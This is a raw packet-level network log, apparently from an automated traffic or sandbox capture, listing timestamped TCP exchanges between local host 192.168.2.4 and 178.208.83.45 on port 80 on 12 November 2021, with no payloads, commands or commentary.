                          Nov 12, 2021 22:24:21.838529110 CET5015180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:21.838537931 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.838567972 CET5015180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:21.838608027 CET5015180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:21.838665009 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.838720083 CET5015180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:21.838721037 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.838749886 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.838776112 CET5015180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:21.838799000 CET5015180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:21.862943888 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.862962961 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.862971067 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.862984896 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.862993956 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863003016 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863010883 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863024950 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863032103 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863044977 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863051891 CET5015180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:21.863054037 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863065958 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863075018 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863085985 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863095045 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863097906 CET5015180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:21.863106966 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863116026 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863126993 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863137007 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863146067 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863153934 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863162994 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863174915 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863183975 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863209963 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863228083 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863243103 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863260984 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863276958 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863291979 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863308907 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863325119 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863339901 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863357067 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863372087 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863388062 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863405943 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.863420963 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.885705948 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.885754108 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.885771036 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.885783911 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.885799885 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.885814905 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.885859013 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.885875940 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.885890961 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.885905027 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.885983944 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.886001110 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.886014938 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.886029005 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.888654947 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.888780117 CET5015180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:21.928762913 CET5015180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:21.929081917 CET5015080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:21.930231094 CET5015280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:21.951143026 CET8050151178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.951241970 CET5015180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:21.951467991 CET8050150178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.951613903 CET5015080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:21.952580929 CET8050152178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.952661037 CET5015280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:21.953377008 CET5015280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:21.975671053 CET8050152178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.979717970 CET8050152178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:21.979804993 CET5015280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.134177923 CET5015280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.156743050 CET8050152178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.156820059 CET5015280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.157618046 CET5015380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.179969072 CET8050153178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.180155993 CET5015380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.180668116 CET5015380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.202975035 CET8050153178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.206614971 CET8050153178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.206707954 CET5015380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.316937923 CET5015380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.318980932 CET5015480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.339587927 CET8050153178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.341331959 CET8050154178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.341468096 CET5015380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.341592073 CET5015480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.342566013 CET5015480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.364948988 CET8050154178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.368038893 CET8050154178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.368504047 CET5015480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.473251104 CET5015480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.474451065 CET5015580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.495743990 CET8050154178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.496790886 CET8050155178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.496898890 CET5015480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.496963978 CET5015580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.497692108 CET5015580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.519979954 CET8050155178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.524527073 CET8050155178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.524715900 CET5015580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.629754066 CET5015580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.632157087 CET5015680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.652173042 CET8050155178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.652287006 CET5015580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.654683113 CET8050156178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.654794931 CET5015680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.656893969 CET5015680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.662036896 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.679477930 CET8050156178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.682028055 CET8050156178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.682120085 CET5015680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.684587955 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.684772015 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.685765982 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.685866117 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.686041117 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.686117887 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.708364964 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.708408117 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.708462000 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.708487988 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.708535910 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.708544016 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.708568096 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.708578110 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.708595991 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.708627939 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.708668947 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.708699942 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.708718061 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.708734035 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.708750010 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.708766937 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.708770990 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.708807945 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.708843946 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.731100082 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.731189013 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.731200933 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.731215954 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.731230021 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.731242895 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.731254101 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.731333017 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.731344938 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.731363058 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.731374025 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.731396914 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.731443882 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.731446028 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.731462002 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.731478930 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.731501102 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.731506109 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.731523991 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.731543064 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.731564999 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.731570005 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.731587887 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.731600046 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.731616974 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.731620073 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.731627941 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.731647015 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.731708050 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.753845930 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.753878117 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.753891945 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.753907919 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.753950119 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.753983974 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.754031897 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754057884 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.754097939 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.754108906 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754127979 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754143953 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754159927 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754164934 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.754179001 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754195929 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754270077 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754286051 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754302979 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754349947 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754364014 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754380941 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754398108 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754441977 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754456997 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754472971 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754560947 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754578114 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754595041 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754611015 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754626989 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754643917 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754659891 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754674911 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754689932 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754734993 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754831076 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754847050 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754863977 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754878998 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754894972 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.754910946 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.776570082 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.776690006 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.776822090 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.776917934 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.777077913 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.777287006 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.777302980 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.777313948 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.777324915 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.777334929 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.779814005 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.779946089 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.786079884 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.811887026 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.812063932 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.928319931 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.928617001 CET5015680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.929780006 CET5015880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.950902939 CET8050157178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.950984001 CET5015780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.951056004 CET8050156178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.951118946 CET5015680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.952120066 CET8050158178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.952389956 CET5015880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.952966928 CET5015880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:22.975908995 CET8050158178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.975950956 CET8050158178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.975958109 CET8050158178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:22.976038933 CET5015880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.083012104 CET5015880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.085059881 CET5015980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.105470896 CET8050158178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.105566978 CET5015880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.107381105 CET8050159178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.107539892 CET5015980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.108228922 CET5015980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.130577087 CET8050159178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.130594969 CET8050159178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.130636930 CET8050159178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.130686045 CET5015980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.130731106 CET5015980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.238466024 CET5015980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.240045071 CET5016080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.260987043 CET8050159178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.262895107 CET8050160178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.263058901 CET5015980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.263596058 CET5016080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.263624907 CET5016080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.286191940 CET8050160178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.291662931 CET8050160178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.292313099 CET5016080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.395246029 CET5016080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.396478891 CET5016180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.417716026 CET8050160178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.417956114 CET5016080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.418956995 CET8050161178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.419693947 CET5016180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.420593023 CET5016180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.443072081 CET8050161178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.447393894 CET8050161178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.449631929 CET5016180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.567435026 CET5016180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.569046021 CET5016280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.595294952 CET8050161178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.595320940 CET8050162178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.595406055 CET5016180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.595504045 CET5016280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.596543074 CET5016280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.618901968 CET8050162178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.628241062 CET8050162178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.628407955 CET5016280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.739372015 CET5016280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.741089106 CET5016380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.761859894 CET8050162178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.763662100 CET5016280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.764930964 CET8050163178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.766994953 CET5016380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.768141985 CET5016380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.794715881 CET8050163178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.883717060 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.906116009 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.906306028 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.907134056 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.907504082 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.907520056 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.907634974 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.929440975 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.929714918 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.929737091 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.929757118 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.929774046 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.929791927 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.929809093 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.929826021 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.929831982 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.929891109 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.929908037 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.929934978 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.929953098 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.929969072 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.929987907 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.930027008 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.930042982 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.930058002 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.952228069 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.952274084 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.952279091 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.952286959 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.952290058 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.952332020 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.952333927 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.952342033 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.952379942 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.952387094 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.952397108 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.952461958 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.952466011 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.952512980 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.952513933 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.952536106 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.952557087 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.952573061 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.952589989 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.952593088 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.952601910 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.952617884 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.952630043 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.952646017 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.952646017 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.952656984 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.952666998 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.952698946 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.952749014 CET5016480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:23.974838972 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.974874973 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.974886894 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.974903107 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.974919081 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.974934101 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975020885 CET8050164178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:23.975035906 CET8050164178.208.83.45192.168.2.4
